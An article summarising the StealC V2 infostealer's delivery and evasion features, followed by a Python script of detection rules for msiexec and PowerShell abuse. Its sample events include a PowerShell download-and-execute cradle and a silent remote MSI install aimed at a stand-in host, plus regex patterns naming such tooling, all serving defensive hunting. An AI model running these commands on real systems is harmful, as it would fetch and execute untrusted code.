StealC V2, the latest version of the StealC infostealer and downloader active since January 2023, was released in March 2025 with major upgrades that boost its stealth, flexibility, and delivery capabilities. Researchers from Zscaler note enhancements including a streamlined JSON-based C2 protocol, RC4 encryption, and advanced payload delivery using MSI packages and PowerShell scripts, expanding its infection vectors beyond the traditional EXE and DLL formats. The malware also includes a redesigned control panel and a customizable builder that enables geolocation- and software-based targeting, multi-monitor screenshot capture, and server-side credential brute-forcing.
To avoid detection, StealC V2 performs language checks so that it does not run on systems in CIS countries, and it executes PowerShell payloads in memory, evading disk-based defenses. Its use of legitimate Windows tools such as msiexec.exe and powershell.exe further enhances stealth and persistence. With these upgrades, StealC V2 demonstrates the increasing sophistication of commodity malware and its ability to evade traditional detection methods.
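The two delivery and evasion behaviours described above (msiexec.exe installing MSI packages and powershell.exe running payloads in memory) leave traces in process-creation telemetry even when nothing is written to disk. The following is an added example of hunting logic over such events; it is not StealC V2 code and not Zscaler's detection signatures. The event fields (parent image, image, command line) and the sample events are constructed for illustration, and the rules are generic LOLBin heuristics rather than indicators taken from the report.

```python
"""Hunting rules for loader behaviour that abuses msiexec.exe and powershell.exe.

Added example (not StealC V2 code, not vendor signatures). The ProcessEvent
fields mirror what a Sysmon Event ID 1 or EDR process-creation record carries;
the field names are an assumption for this example.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the created process image
    command_line: str   # command line of the created process


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# User-facing applications that should rarely spawn quiet MSI installs.
USER_APPS = {"winword.exe", "excel.exe", "outlook.exe",
             "chrome.exe", "msedge.exe", "firefox.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

URL_RE = re.compile(r"(?i)\bhttps?://\S+")
# /q, /qn, /qb, /quiet, /passive: unattended MSI install switches.
MSI_QUIET_RE = re.compile(r"(?i)(?:^|\s)/(?:q[nb]?|quiet|passive)(?=\s|$)")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc...).
PS_ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?(?=\s|$)")
PS_HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
PS_IEX_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
PS_DOWNLOAD_RE = re.compile(
    r"(?i)downloadstring|downloaddata|net\.webclient|invoke-webrequest|\biwr\b")


def rule_msiexec_remote_package(ev: ProcessEvent) -> bool:
    """msiexec.exe asked to install a package straight from a URL."""
    return _basename(ev.image) == "msiexec.exe" and bool(URL_RE.search(ev.command_line))


def rule_msiexec_quiet_from_user_app(ev: ProcessEvent) -> bool:
    """Silent MSI install spawned by an Office application or browser."""
    return (_basename(ev.image) == "msiexec.exe"
            and bool(MSI_QUIET_RE.search(ev.command_line))
            and _basename(ev.parent_image) in USER_APPS)


def rule_powershell_encoded_command(ev: ProcessEvent) -> bool:
    """powershell.exe launched with a Base64-encoded command."""
    return _basename(ev.image) in POWERSHELL and bool(PS_ENCODED_RE.search(ev.command_line))


def rule_powershell_hidden_window(ev: ProcessEvent) -> bool:
    """powershell.exe launched with its window hidden from the user."""
    return _basename(ev.image) in POWERSHELL and bool(PS_HIDDEN_RE.search(ev.command_line))


def rule_powershell_in_memory_cradle(ev: ProcessEvent) -> bool:
    """Download-and-evaluate pattern: script fetched over HTTP and run without touching disk."""
    cl = ev.command_line
    return (_basename(ev.image) in POWERSHELL
            and bool(PS_IEX_RE.search(cl)) and bool(PS_DOWNLOAD_RE.search(cl)))


RULES: List[Tuple[str, Callable[[ProcessEvent], bool]]] = [
    ("msiexec_remote_package", rule_msiexec_remote_package),
    ("msiexec_quiet_from_user_app", rule_msiexec_quiet_from_user_app),
    ("powershell_encoded_command", rule_powershell_encoded_command),
    ("powershell_hidden_window", rule_powershell_hidden_window),
    ("powershell_in_memory_cradle", rule_powershell_in_memory_cradle),
]


def detect(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on every event."""
    findings = []
    for idx, ev in enumerate(events):
        for name, predicate in RULES:
            if predicate(ev):
                findings.append((idx, name))
    return findings


# Constructed sample telemetry (example.invalid is a reserved, non-routable name).
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\explorer.exe", SYS32 + "msiexec.exe",
                 'msiexec.exe /i "C:\\Users\\alice\\Downloads\\Setup.msi"'),          # benign
    ProcessEvent("C:\\Program Files\\Google\\Chrome\\chrome.exe", SYS32 + "msiexec.exe",
                 "msiexec.exe /i http://example.invalid/update.msi /qn"),           # remote + quiet
    ProcessEvent(SYS32 + "cmd.exe", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -NoProfile -w hidden -enc SQBFAFgAIAAoAC4ALgAuAA=="),  # encoded, hidden
    ProcessEvent("C:\\Windows\\explorer.exe", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -NoProfile Get-ChildItem C:\\Temp"),               # benign
    ProcessEvent("C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe",
                 SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -ep bypass -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/s.ps1')\""),              # in-memory cradle
    ProcessEvent("C:\\Windows\\explorer.exe", SYS32 + "msiexec.exe",
                 "msiexec.exe /x {ABCD1234-0000-0000-0000-000000000000} /qn"),       # benign uninstall
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The rules key on the command line and the parent process rather than on file hashes, because an in-memory PowerShell stage and a freshly rebuilt MSI defeat hash-based matching; in production these predicates would be expressed as a SIEM or EDR query over the same fields, with the encoded-command rule tuned against the organisation's own management scripts.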